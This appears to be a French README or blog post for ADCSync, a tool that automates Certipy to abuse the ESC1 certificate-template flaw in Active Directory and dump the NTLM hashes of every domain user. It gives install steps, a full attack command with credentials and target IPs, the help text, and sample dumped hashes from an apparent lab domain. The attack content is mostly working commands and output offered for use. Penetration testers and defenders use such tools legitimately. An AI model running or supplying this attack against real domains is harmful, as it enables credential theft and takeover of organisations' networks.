
Utilisez ESC1 pour effectuer un DCSync de fortune et dump hashes
C'est un outil que j'ai bricolé rapidement pour effectuer un DCSync en utilisant ESC1. Il est assez lent mais reste un moyen efficace de mener une attaque DCSync de fortune sans utiliser DRSUAPI ou Volume Shadow Copy.
C'est la première version de l'outil et elle automatise essentiellement le processus d'exécution de Certipy contre chaque utilisateur d'un domaine. Il reste encore beaucoup de travail et je prévois d'ajouter d'autres fonctionnalités à l'avenir pour les méthodes d'authentification et pour automatiser la recherche d'un modèle vulnérable.
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::
ADCSync utilise l'exploit ESC1 pour extraire les hachages NTLM des comptes utilisateurs dans un environnement Active Directory. L'outil récupère d'abord chaque utilisateur et domaine du fichier de dump Bloodhound passé en entrée. Ensuite, il utilise Certipy pour faire une demande pour chaque utilisateur et stocke leur fichier PFX dans le répertoire des certificats. Enfin, il utilise Certipy pour s'authentifier avec le certificat et récupérer le hachage NT pour chaque utilisateur. Ce processus est assez lent et peut prendre du temps, mais offre une alternative pour extraire les hachages NTLM.
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt
Pour utiliser cet outil, nous avons besoin des éléments suivants :
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Usage: adcsync.py [OPTIONS]
Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of the target machine [required]
--help Show this message and exit.